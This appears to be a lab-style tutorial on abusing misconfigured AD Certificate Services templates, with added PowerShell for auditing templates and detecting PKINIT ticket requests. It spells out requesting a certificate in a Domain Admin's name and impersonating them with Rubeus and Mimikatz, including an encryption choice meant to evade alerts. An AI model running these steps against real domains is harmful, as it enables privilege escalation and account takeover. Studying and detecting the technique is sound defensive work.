
Certificates

AD Certificate Services (AD CS) is Microsoft's Public Key Infrastructure (PKI) implementation. Since AD already provides a level of trust within an organization, it can act as a Certificate Authority (CA) to prove and delegate trust. AD CS is used for encrypting file systems, creating and verifying digital signatures, and user authentication.

Since AD CS is a privileged function, it usually runs on selected domain controllers, meaning normal users cannot interact with the service directly. But organizations tend to be too large for an administrator to create and distribute each certificate manually. This is where certificate templates come in.

AD CS administrators can create templates that allow any user with the relevant permissions to request a certificate themselves. These templates have parameters that define which users can request the certificate and what is required. Specific combinations of these parameters can be abused for privilege escalation and persistent access.


Finding Vulnerable Certificate Templates

To find vulnerable templates we can use the Windows built-in tool certutil, which outputs the configuration of every template.


  • We are looking for a template with the following poisonous parameter combination:
    • Client Authentication - the certificate can be used for client authentication.
    • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - the certificate template allows us to specify the Subject Alternative Name (SAN).
    • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - the certificate will be exportable together with its private key.
    • Certificate permissions - we have the required permissions to enroll using the certificate template.

:: Dump Output on all Configured Templates
certutil -Template -v > Templates.txt
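The same check can be run as an audit against the Configuration partition, where the templates live as pKICertificateTemplate objects. This is an added example, not code from the original page or from PSPKIAudit; it assumes the RSAT ActiveDirectory module is available and, going one step beyond the list above, also treats "manager approval required" as a mitigating control.

```powershell
# Added audit example, not code from the original page. Assumes the RSAT ActiveDirectory
# module and read access to the Configuration naming context (granted to domain users by default).
Import-Module ActiveDirectory

# Flag values documented for the template attributes (MS-CRTD)
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1    # msPKI-Certificate-Name-Flag
$CTPRIVATEKEY_FLAG_EXPORTABLE_KEY  = 0x10   # msPKI-Private-Key-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2    # msPKI-Enrollment-Flag: manager approval required
$EnrollRightGuid = [Guid]'0e10c968-78fb-11d1-a9c7-0000f80367c1'   # Certificate-Enrollment right
# EKUs that allow client authentication; a template with no EKU at all also qualifies
$ClientAuthEkus = '1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '1.3.6.1.5.2.3.4', '2.5.29.37.0'

$base  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
$props = 'msPKI-Certificate-Name-Flag', 'msPKI-Private-Key-Flag', 'msPKI-Enrollment-Flag', 'pKIExtendedKeyUsage', 'nTSecurityDescriptor'

Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
ForEach-Object {
    $t = $_
    $ekus = @($t.pKIExtendedKeyUsage | Where-Object { $_ })
    $clientAuth      = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $ClientAuthEkus -contains $_ }).Count -gt 0)
    $suppliesSubject = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $exportable      = ($t.'msPKI-Private-Key-Flag' -band $CTPRIVATEKEY_FLAG_EXPORTABLE_KEY) -ne 0
    $needsApproval   = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0

    # Principals allowed to enroll: the Enroll extended right, all extended rights, or GenericAll
    $enrollers = $t.nTSecurityDescriptor.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (
            $_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
            ($_.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
             ($_.ObjectType -eq $EnrollRightGuid -or $_.ObjectType -eq [Guid]::Empty))
        )
    } | ForEach-Object { $_.IdentityReference.Value }

    # Report only templates that show the full combination and are not gated by manager approval
    if ($clientAuth -and $suppliesSubject -and $exportable -and -not $needsApproval) {
        [pscustomobject]@{
            Template  = $t.Name
            Enrollers = (@($enrollers) | Sort-Object -Unique) -join ', '
        }
    }
} | Format-Table -AutoSize -Wrap
```

Any template listed with a broad enrollment group (such as Domain Users or Authenticated Users) should have "Supply in the request" removed or manager approval enabled.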


The process of finding a vulnerable template can be automated with PSPKIAudit, although a manual approach is recommended.

PSPKIAudit

# Unblock files that were downloaded from the Internet
Get-ChildItem -Recurse | Unblock-File

# Relax the execution policy for the current process only
Set-ExecutionPolicy Bypass -Scope Process -Force

# Import the module into the current session
Import-Module .\PSPKIAudit.psm1


Exploiting a Certificate Template

Required privileges: Administrators

Make sure Restricted Admin Mode is disabled.


RDP into the target machine with administrator privileges.

  • Start the Microsoft Management Console (MMC):
    • Click File ➜ Add/Remove Snap-in...
    • Add the Certificates snap-in and make sure to select Computer account and Local computer on the prompts.
    • Click OK.
    • We should now see the Certificates snap-in.

  • We will now request a personal certificate:
    • Right-click on Personal and select All Tasks ➜ Request New Certificate...
    • Click Next twice to select the AD Enrollment Policy.
    • We will see that there is one template we can request, but first we need to provide additional information.
    • Click on the "More information is required" warning.
    • Change the Subject name Type option to Common name, provide any value (it does not matter), and click Add.
    • Change the Alternative name Type option to User principal name.
    • Supply the UPN of the user you want to impersonate. The best would be a DA account such as Administrator@za.adobe.loc. Click Add.
    • Click Apply and OK.
    • Now select the certificate and click Enroll. We should be able to see our certificate.

  • The last step is to export our certificate together with the private key:
    • Right-click on the certificate and select All Tasks ➜ Export...
    • Click Next, select Yes, export the private key, and click Next.
    • Click Next, then set a password for the certificate, since the private key cannot be exported without one.
    • Click Next and select a location to store the certificate.
    • Click Next and finally click Finish.

User Impersonation Through a Certificate

Now we can impersonate a user. To perform this, two steps are required:

  • Use the certificate to request a Kerberos Ticket-Granting Ticket (TGT)
  • Load the Kerberos TGT

For the first step we can use Rubeus, a tool for raw Kerberos interaction and abuse.

:: [user]        - The user we will impersonate; it has to match the UPN in the certificate we generated
:: [enctype]     - The encryption type for the ticket. Setting this is important for evasion, since the default encryption algorithm is weak and would trigger an Overpass-the-Hash alert
:: [certificate] - Path to the certificate we generated
:: [password]    - Password of our certificate file
:: [outfile]     - The file the TGT will be written to
:: [domain]      - FQDN of the domain we are currently attacking
:: [dc]          - IP of the domain controller we request the TGT from. It is usually best to select a DC that has the CA service running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: /domain:za.adobe.loc /dc:

:: Query Example
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\arthur.holland\Desktop\certificate.pfx /password:492xzL5O4TS /outfile:administrator.kirbi /domain:za.adobe.loc /dc:10.20.30.50
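On the defensive side, the request above lands on the DC as Event ID 4768 with Pre-Authentication Type 16 (PA-PK-AS-REQ, i.e. certificate-based) and the certificate issuer and thumbprint fields populated, whatever enctype was chosen. The following added detection example (not from the original page) runs over constructed sample records; the field names mirror the 4768 event, but the `Get-WinEvent` mapping and the privileged-account list are assumptions for your environment.

```powershell
# Added detection example, not code from the original page. The $events records are constructed
# sample data shaped like 4768 fields; in production build them from
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768 } (field mapping is an assumption).
$PrivilegedAccounts = @('Administrator')   # assumption: extend with your Tier-0 accounts

$events = @(
    @{ Account = 'arthur.holland'; PreAuthType = '2';  EncType = '0x12'; Issuer = '';      Thumbprint = '';              Client = '10.20.30.77' },
    @{ Account = 'Administrator';  PreAuthType = '16'; EncType = '0x12'; Issuer = 'za-CA'; Thumbprint = '<constructed>'; Client = '10.20.30.77' },
    @{ Account = 'Administrator';  PreAuthType = '16'; EncType = '0x17'; Issuer = 'za-CA'; Thumbprint = '<constructed>'; Client = '10.20.30.77' },
    @{ Account = 'svc-backup';     PreAuthType = '16'; EncType = '0x12'; Issuer = 'za-CA'; Thumbprint = '<constructed>'; Client = '10.20.30.15' }
)

function Test-PkinitTgtRequest {
    param([hashtable]$Event)
    # Only certificate-based pre-authentication (PA-PK-AS-REQ) is of interest here;
    # password-based requests (type 2, PA-ENC-TIMESTAMP) are ignored
    if ($Event.PreAuthType -ne '16') { return $null }

    $reasons = @('PKINIT TGT request')
    # 0x17 = RC4-HMAC: the weak default the page mentions, 0x12 = AES256 the attacker selects to evade
    if ($Event.EncType -eq '0x17') { $reasons += 'RC4 ticket (weak enctype, Overpass-the-Hash pattern)' }
    # A DA account authenticating with a certificate deserves review even with AES, since the
    # enctype switch only suppresses the RC4-based alert, not the certificate indicators
    if ($PrivilegedAccounts -contains $Event.Account) { $reasons += 'privileged account' }

    $severity = 'Low'
    if ($reasons.Count -eq 2) { $severity = 'Medium' }
    if ($reasons.Count -ge 3) { $severity = 'High' }

    [pscustomobject]@{
        Account    = $Event.Account
        Client     = $Event.Client
        Issuer     = $Event.Issuer
        Thumbprint = $Event.Thumbprint
        Severity   = $severity
        Reasons    = $reasons -join '; '
    }
}

$events | ForEach-Object { Test-PkinitTgtRequest $_ } | Where-Object { $_ } | Format-Table -AutoSize -Wrap
```

The thumbprint can be matched against the CA's issued-certificate database to find the template and requester behind a suspicious TGT.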


Now we can use Mimikatz to load the TGT and authenticate. Afterwards we can verify that the ticket was injected correctly with the Windows built-in command klist.

privilege::debug

:: Pass the ticket (PTT) from the .kirbi file into the current session
kerberos::ptt administrator.kirbi